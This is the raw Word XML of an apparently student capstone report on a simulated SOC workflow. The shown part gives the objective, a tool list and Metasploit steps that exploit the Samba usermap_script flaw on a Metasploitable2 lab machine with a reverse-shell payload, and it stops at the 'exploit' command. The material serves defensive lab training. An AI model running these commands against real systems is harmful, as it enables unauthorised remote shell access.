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45D1" w14:textId="6D90CA98" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="00571C3C">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk215164822"/>
      <w:r w:rsidRPr="00C22DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>TASK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C22DB6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Capstone Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDAA97" w14:textId="66B90ED2" w:rsidR="008912FB" w:rsidRDefault="008912FB" w:rsidP="00571C3C">
      <w:pPr>
        <w:spacing w:after="55" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7030A0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Full SOC Workflow Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B62E15" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="00AB1840" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.Objective</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDDD250" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">To simulate a complete SOC workflow by launching a sample cyberattack, detecting it using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>analyzing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> and triaging the alert, blocking the attacker with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">, escalating the incident in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>TheHive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, and finally documenting the findings in a report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE4F5F4" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="00AB1840" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A9E26F3" w14:textId="06D7C128" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="008912FB" w:rsidP="00AB1840">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.Tools Used</w:t>
      </w:r>
      <w:r w:rsidR="00AB1840" w:rsidRPr="00AB1840">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB1840" w:rsidRPr="00AB1840">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools &amp; Technologies </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204938C8" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Metasploit – Attack simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341417EA" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Metasploitable2 – Vulnerable target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E63BE3" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – SIEM for detection &amp; alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789418B3" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>CrowdSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Threat blocking &amp; response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648495CC" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>TheHive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Incident escalation &amp; case management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D738CF3" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Google Docs – Final reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F317F2" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>VirtualBox / VMware – Lab environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA9EAA" w14:textId="77777777" w:rsidR="00AB1840" w:rsidRPr="00AB1840" w:rsidRDefault="00AB1840" w:rsidP="00AB1840">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Kali Linux – Attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBC6389" w14:textId="2FD5D459" w:rsidR="008912FB" w:rsidRPr="00AB1840" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="746679D4" w14:textId="1FBB861F" w:rsidR="008912FB" w:rsidRDefault="00C32513" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00AA6100">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0190FABE" wp14:editId="337B6417">
                <wp:extent cx="308610" cy="308610"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="478244914" name="Rectangle 3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8C2FE" id="Rectangle 32" o:spid="_x0000_s1026" alt="Generated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B93F7B1" w14:textId="77777777" w:rsidR="00C32513" w:rsidRPr="00C32513" w:rsidRDefault="00C32513" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18F8494B" w14:textId="2D23CE68" w:rsidR="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1. ATTACK SIMULATION</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB1840">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">(Metasploit → Metasploitable2 Samba </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248B786" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gain a remote shell on Metasploitable2 using exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB53991" w14:textId="77777777" w:rsidR="008912FB" w:rsidRPr="008912FB" w:rsidRDefault="008912FB" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008912FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Step-by-Step Commands + Realistic Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156C7E22" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A5CB98C" w14:textId="22363A6F" w:rsidR="008912FB" w:rsidRPr="00E6742E" w:rsidRDefault="00C32513" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Step 1: Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABDB03" w14:textId="3CBE88F0" w:rsidR="00C32513" w:rsidRDefault="00C32513" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C32513">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10885F6E" w14:textId="60368614" w:rsidR="00C32513" w:rsidRDefault="00C32513" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C32513">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26C287C8" wp14:editId="0FDFC752">
            <wp:extent cx="4496427" cy="819264"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18057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1952" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4496427" cy="819264"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460D773" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E76C8F4" w14:textId="50BF4257" w:rsidR="00C32513" w:rsidRPr="00E6742E" w:rsidRDefault="00C32513" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Step 2: Load the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610A4632" w14:textId="5087C74F" w:rsidR="00C32513" w:rsidRDefault="00C32513" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00C32513">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>use exploit/multi/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C32513">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>usermap_script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F2CE9E5" w14:textId="5417DD0E" w:rsidR="00C32513" w:rsidRDefault="00E6742E" w:rsidP="008912FB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32883BED" wp14:editId="2F6FC4C5">
            <wp:extent cx="3515216" cy="323895"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="18470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7513" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3515216" cy="323895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="612BA459" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217C10C2" w14:textId="77F7314F" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Step 3: Set RHOST and LHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9BB726" w14:textId="6E5551EF" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>set RHOSTS 192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CDEA06" w14:textId="296DA6B4" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D97AB05" w14:textId="2A5376C8" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>/reverse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C2376" w14:textId="77777777" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33AEA14A" w14:textId="624CE5E3" w:rsidR="00E6742E" w:rsidRPr="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Step 4: Run exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754E41FF" w14:textId="37C44669" w:rsidR="00E6742E" w:rsidRDefault="00E6742E" w:rsidP="00E6742E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6742E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
